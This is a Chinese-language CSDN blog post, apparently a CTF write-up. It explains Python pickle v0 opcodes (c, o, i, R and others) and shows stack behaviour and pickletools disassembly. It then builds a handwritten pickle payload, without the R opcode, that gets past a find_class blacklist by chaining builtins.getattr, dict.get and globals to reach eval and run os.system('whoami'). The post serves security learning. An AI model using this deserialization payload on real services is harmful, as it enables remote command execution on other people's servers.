手撸 opcode

最新推荐文章于 2022-02-24 12:00:50 发布
最新推荐文章于 2022-02-24 12:00:50 发布
阅读量683 收藏 3
点赞数 1
分类专栏: pickle反序列化 文章标签: python opcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/CSDNiamcoming/article/details/119382245
版权

手撸 opcode

前言

自己立的 flag,哭着也要完成不是,见上一篇文章 极客巅峰2021 web opcode,还是以这个题为例 opcode.tar.gz,在禁用了 R 指令的情况下绕过 find_class 黑名单的限制

推荐一篇文章 pickle反序列化初探 - 先知社区 (aliyun.com),真的写得太详细了,师傅很贴心的用了动图给我们观察栈的变化,还有每个指令的详细介绍,认真看完手撸完全不是问题

我这里主要是记录一下自己所学,完成 在禁用了 R 指令的情况下绕过 find_class 黑名单限制 的 payload,所以只着重介绍了一下 R、i、o 指令的用法,其他详细的 opcode 编写方法,还是请阅读推荐文章

一、opcode 指令介绍

opcode 现在共六个版本,而高版本向低版本兼容,所以我们直接学习 v0 就行了,其他版本都有不可见字符,既不利于理解,也有可能造成不必要的麻烦

关于 find_class,当出现 c、i、b’\x93’(当然,v0 的话,b’\x93’ 就不用管了)时才会被触发

具体指令的介绍如下,这里只摘录一些会用到的指令,更多指令介绍请前往前面介绍的文章中学习

opcode描述写法栈变化
c获取一个全局对象或import一个模块c[module]\n[instance]\n获得的对象入栈
o寻找栈中的上一个MARK,以之间的第一个数据为callable
第二个参数到第n个数据为参数		(c[module]\n[callable]\nS’arg1’\nS’arg2’\no.这个过程中涉及到的数据都出栈,函数返回值入栈
R选择栈上的第一个对象作为函数、第二个对象作为参数(为元组),调用函数c[module]\n[callable]\n(S’arg’\ntR.函数和参数出栈,函数的返回值入栈
i相当于c与o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(S’arg1’\nS’arg2’\ni[module]\n[callablel]\n这个过程中涉及到的数据都出栈,函数返回值入栈
S实例化一个字符串对象S‘string’获得的对象入栈
(向栈中压入一个MARK标记(MARK标记入栈
t寻找栈中的上一个MARK,并组合之间的数据为列表(S’arg1’\nS’arg2’\ntMARK标记以及被组合的数据出栈获得对象入栈
.程序结束,栈顶的元素作为pickle.loads()的返回值.

可用来调用函数的指令有 R、o、i,模板如下:

# __import__("builtins").print('a', 'b')

R = b'''cbuiltins
print
(S'a'
S'b'
tR.
'''

o = b'''(cbuiltins
print
S'a'
S'b'
o.
'''

i = b'''(S'a'
S'b'
ibuiltins
print
.
'''

上面的三个字符串反序列化的效果都是 print('a', 'b'),但是写法区别还是蛮大的,在分析栈变化情况前,我们先来看看值得注意的点

  1. 只有 i 指令中没有用到 c 指令,c 指令的作用是导入 模块中的实例,i 指令包含 导入和执行
  2. 没有指令可以直接导入 模块、实例等,必须是 模块加实例 的方式
  3. 三个指令的 “ ( ” (标记MARK)位置不同
    1. R 指令的 MARK 标记在第一个参数的开始,用 t 指令将所有参数打包为 元组,传给 c 导入的函数
    2. o 指令的 MARK 标记在 c 指令前,先选取前面两个字符串为 模块.函数,然后后面的都是参数
    3. i 指令的 MARK 标记也在最前,标记为参数,然后 i 指令后面的两个字符串为 模块.函数

我们再来分析一下三个指令执行过程中栈的变化

  1. R 指令:
    1. 先将 builtins.print 压栈
    2. 再将 MARK 标记压栈
    3. 再将字符串 ‘a’、‘b’ 分别压栈
    4. 执行 t 指令,将 ‘b’、‘a’、MARK 出栈,有 MARK 出栈就会停止,组合为 (‘a’, ‘b’) 这样一个元组再入栈
    5. 执行 R 指令,(‘a’, ‘b’) 与 builtins.print 出栈,执行 print(‘a’, ‘b’),结果压栈,即 print 的返回值 None
  2. o 指令
    1. 先将 MARK 标记压栈
    2. 再将 builtins.print 压栈
    3. 再将 ‘a’、‘b’ 分别压栈
    4. 执行 o 指令, ‘b’、‘a’、builtins.print、MARK,分别出栈,执行 print(‘a’, ‘b’),结果压栈
  3. i 指令
    1. 先将 MARK 压栈
    2. ‘a’、‘b’ 分别压栈
    3. builtins.print 压栈
    4. 执行 print(‘a’, ‘b’),结果压栈

有时候 opcode 比较复杂,可能会被绕晕,这里有个工具 pickletools,其中 optimize 方法可以帮我们优化 opcode,dis 方法可以帮我们将 pickle 的符号化反汇编数据输出,效果如下

import pickletools

R = b'''(cbuiltins
print
S'a'
S'b'
o.
'''

print(pickletools.optimize(R))
pickletools.dis(R)

# 输出
# b"(cbuiltins\nprint\nS'a'\nS'b'\no."
#
#     0: (    MARK
#     1: c        GLOBAL     'builtins print'
#    17: S        STRING     'a'
#    22: S        STRING     'b'
#    27: o        OBJ        (MARK at 0)
#    28: .    STOP
# highest protocol among opcodes = 1

dis 方法很直观的给我们展现了 opcode 的执行方式,可以看到,o 指令找到了位置为 0 的 MARK,根据执行我们对 o 指令的了解,知道是执行了 builtins.print,参数为 ‘a’、‘b’

二、编写 payload

builtins.getattr(builtins, 'eval')("__import__('os').system('pwd')") 这样子构造 payload,用到 c 指令导入的就只有 builtins.getattr 和 builtins,但是 builtins 并不能直接导入,所以需要去获取

获取 builtins 的 方式:builtins.getattr(builtins.dict, 'get')(builtins.globals(), 'builtins')

也就是说,我们将 builtins.getattr(builtins.getattr(builtins.dict, 'get')(builtins.globals(), 'builtins'), 'eval')("__import__('os').system('pwd')") 编写为不含 R 指令的 opcode,就可以达到绕过的目的了

参考推荐文章中的绕过 find_class 的 payload:

b’’‘cbuiltins
getattr
p0
(cbuiltins
dict
S’get’
tRp1
cbuiltins
globals
)Rp2
00g1
(g2
S’builtins’
tRp3
0g0
(g3
S’eval’
tR(S’__import__(“os”).system(“whoami”)’
tR.
‘’’

这个比较复杂,我们可以分步骤编写

首先是最外层的 function("__import__('os').system('pwd')")

b'''(

S'__import__("os").system("whoami")'
o.
'''

然后是外层的 builtins.getattr

b'''((cbuiltins
getattr

arg1

S'eval'
o
S'__import__("os").system("whoami")'
o.
'''

继续完成 arg1

b'''((cbuiltins
getattr

(function

arg1

S'builtins'
o
S'eval'
o
S'__import__("os").system("whoami")'
o.
'''

function 的 arg1,这里是,使用 o 指令的话,没有参数就不用写,如果是 R 指令,需要用 ) 压入一个空元组

b'''((cbuiltins
getattr

(function

(cbuiltins
globals
o
S'builtins'
o
S'eval'
o
S'__import__("os").system("whoami")'
o.
'''

最后的 function,也就是内层的 builtins.getattr

b'''((cbuiltins
getattr

((cbuiltins
getattr

cbuiltins
dict

S'get'
o
(cbuiltins
globals
o
S'builtins'
o
S'eval'
o
S'__import__("os").system("whoami")'
o.
'''

去掉多余的换行就是最终的 payload 了,可以看到,每个 c 指令的后面的都是 builtins,并且调用的实例并没有在黑名单中

b'''((cbuiltins
getattr
((cbuiltins
getattr
cbuiltins
dict
S'get'
o(cbuiltins
globals
oS'builtins'
oS'eval'
oS'__import__("os").system("whoami")'
o.
'''

这里需要注意的是,在测试的时候如果没有导入 builtins,builtins.globals() 将返回 None,程序会报 AttributeError: 'NoneType' object has no attribute 'eval' 错误

总结

在学习过程中,发现手写的 opcode 真的可以干很多事儿,师傅们总结得已经很到位了,我这里就不献丑了

学习之前我还在想,没有 R 指令是不是不可以绕过,为什么题目不考,网上也没找到文章,学习之后发现,R 指令能做到的,i、o 指令都能做到

的类似WProtect的VM保护引擎,支持OutOfOrder/EquivalentReplacement以及opcode
10-16
的类似WProtect的VM保护引擎,支持OutOfOrder/EquivalentReplacement以及自定有的虚拟机opcode,支出lua脚本引擎
带你zookeeper源码-zookeeper客户端如何和zk集群创建连接
badly的博客
08-25 838
上篇文章带你zookeeper源码-zookeeper集群如何接收客户端的连接的分析了zk集群通过监听2181端口,通过NIO的方式来等待客户端的连接,这篇文章我们主要分析一下看看客户端如何去和zk集群创建连接的 客户端的入口类是org.apache.zookeeper.ZooKeeper, 如果大家通过原生的代码使用zookeeper客户端和服务段建立连接的时候,就是首先需要实例化一个Zookeeper对象,然后传递zk集群的节点ip和端口号,设置超时时间,以及监听器 public Zo..
PHP7开启opcache打造强悍性能
大鹏
09-14 553
鸟哥在博客中说,提高PHP 7性能的几个tips,第一条就是开启opcache: 记得启用Zend Opcache, 因为PHP7即使不启用Opcache速度也比PHP-5.6启用了Opcache快, 所以之前测试时期就发生了有人一直没有启用Opcache的事情 那么什么是Opcache呢? Opcache 的前生是Optimizer+,它是PHP的官方公司 Zend 开发的一款闭源但可以免费使用的 PHP 优化加速组件。 Optimizer+ 将PHP代码预编译生成的脚本文件Opcode...
ORM
a9794666的博客
07-23 282
本文目录 ORM简介 Python中常用ORM框架 原生操作数据库模块 pymysql ORM框架之SQLAlchemy 带你写一个自己的ORM框架 ORM简介 ORM即Object Relational Mapping,全称对象关系映射。当我们需要对数据库进行操作时,势必需要通过连接数据、调用sql语句、执行sql语句等操作,ORM将数据库中的...
刘老师系列
热门推荐
weixin_30654419的博客
01-25 3万+
开始之前,先一发: 刘老师系列之一:ORM 刘老师系列之二:WEB框架 刘老师系列之三:缓存系统 刘老师系列之四:Session 刘老师系列之五:RPC(远程过程调用) 刘老师系列之六:秒杀系统 刘老师系列之七:分布式爬取抖音全网视频 持续更新... 转载于:https://www.cnblogs.com/liu...
轮播
Starjg101的博客
05-11 3202
var left1 = 0; var left2 = 1380; function func() { left1 -= 690; left2 -= 690; $(“flbanner1”).style.left = left1 + “px”; $(“flbanner2”).style.left = left2 + “px”; if (left1 <= -1380){ left1 = 1380;...
自己一个hashMap
王大不明白总有一天会明白
01-04 285
自定义Map接口 package com.example.myhashmap.service; public interface MyMap<K,V> { public V put(K k,V v); public V get(K k); interface MyEntry<K,V>{ public K getKey(); ...
php反编译opcode,从HGAME的pyc逆向来看opcode
weixin_39521651的博客
04-07 984
一次pyc文件恢复Python Pyc的文件格式[compile.h]/* Bytecode object */typedef struct {PyObject_HEADint co_argcount; /* #arguments, except *args */int co_nlocals; /* #local variables */int co_stacksize; ...
带你zookeeper源码-zookeeper集群之间如何进行ping探活机制
badly的博客
08-16 1063
上两篇文章 带你zookeeper源码-zookeeper故障重启时如何恢复数据(一) 带你zookeeper源码-zookeeper故障重启时如何恢复数据(二) 已经详细的把zookeeper故障重启时如何恢复数据给详细的剖析完了,这篇文章我们继续剖析一下在leader和follower数据同步完成之后,leader还会继续做哪些事情,以及如何实现ping机制的 在上篇文章讲到leader同步完数据之后,会发送一个UPTODATE的通知给follower,表示数据已经同步完毕,fo
DNS基础知识以及golang实现的简单DNS服务器
我一点也不皮的博客
02-24 3074
DNS基础 DNS(Domain Name System)是域名系统的缩写,因此DNS的关键在于对请求的域名给予相应的IP地址解析响应。 域名是由一串用点分割的字符组成的Internet上计算机(组)的名称。域名的主要作用是便于记忆一组服务器的地址,并提供字符映射到IP的对应关系。 DNS的查询过程 想要理解DNS,首先就需要熟悉DNS的查询过程。DNS的查询按一定顺序进行,那就是host文件->DNS缓存->DNS服务器。 当DNS接收到域名解析请求时,会首先去检查本机的host文件(一般Li
一个A*+二叉堆优化(三)
lvcoc的博客
01-23 1192
添加了player之后就需要得到player真实坐标对应的网格,所以需要一个根据世界坐标返回数组内坐标的方法 public Node GetFromPositon(Vector3 positon) { float percentX = (positon.x + gridSize.x / 2) / gridSize.x; float percentY =...
hdu1026!哼!0msac
weixin_30813225的博客
05-13 322
哼 EOF超时了 还有打印的时候坐标反了 哼 wa了两次 哼 我这人真的编译过就过的 就这么任性样例都不测一下的呢 超任性的! #include<iostream> #include<cstdio> #include<cstring> #include<queue> using namespace std; ...
LRU算法(java实现)
刘本龙的专栏
11-24 1323
使用javaAPI java 的LinkedHashMap可以实现LRU算法,LinkedHashMap 本身内部有一个触发条件则自动执行的方法:删除最老元素(最近最少使用的元素)。我们只需要通过参数控制数据排序逻辑和数据删除规则就行了。 LinkedHashMap源码中有这么一个注释: <p>The {@link #removeEldestEntry(Map.Entry)} method may be overridden to * impose a policy for removing
5分钟一个阻塞队列
CHANJIAJIA的博客
07-01 468
阻塞队列其实就是额外增加了两个附加操作的队列 在队列已满的情况下,如果继put添加加元素就会阻塞等待; 在队列为空的情况下,如果从队列中take获取元素就会阻塞等待; 接下来我会使用ReentrantLock+Condition的方式来一个阻塞队列,主要的方法就是put()和take()。 import java.util.concurrent.locks.Condition; import java.util.concurrent.locks.ReentrantLock; /** * @p.
ArrayList
coderchem的博客
03-21 3665
package List; import java.util.ArrayList; import javax.swing.text.StyledEditorKit.ForegroundAction; public class MyArrayList<E> { //定可变数组 private Ob...
快速排序
rt12345678910的博客
11-29 716
public class QuickSort { public static void quickSort(int[] arr) { int start = 0; int end = arr.length - 1; quickSort(arr, start, end); } public static void quick...
一个简单的网络框架
张鹿鹿的专栏
02-26 456
开始前 网络访问框架关心的问题: 能并发接受多个请求,并返回"用户"需要的数据 重试机制 实现方式: 队列 线程池 网络框架实现步骤 创建线程池管理类(队列,线程池) 封装请求参数 封装响应数据 封装请求任务 封装"使用工具" 添加重试机制 创建线程池管理类 创建 ThreadPoolManager.java 类,负责管理请求队列和线程池 //1. 创建队列,用来保存异步请求任务 pr...
实现AOP
呵呵的博客
08-23 514
前言 最近看了spring中AOP的源码部分,了解了spring中注解配置AOP和xml配置AOP从解析标签和注解开始一直到创建bean的代理,整个流程下来相当的复杂也对springAOP有了一点简单理解,就想着根据spring处理aop的逻辑自己实现一个aop功能.(写这个只是为了加深对springAOP的理解,不建议在项目中用,项目中还是用spring的aop吧) 思路: 1. 创建切面注解(包括切面类注解和切面方法注解,切点注解) 2. 通过实现BeanPostProcessor处理有切面类注解的类,
双指针快排序始终不行--不晓得是指针地址理解不到位还是---(还是根据严版本的改了)--可以根据地址信息来判断递归结束
qq_42664961的博客
02-11 344
#include<stdio.h> #include <stdlib.h> void sort(int *a, int *left, int *right); void main(){ //int s[] = { 1, 5, 8, 9, 9, 6, 9,10,11515,10,25}; int s[] = { 1, 1, 5, 0 }; int length = ...
opcode
最新发布
03-13
### Opcode in Programming or Assembly Language In programming and particularly within assembly language, opcode stands for operation code. An opcode specifies the operations to be performed by the ...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值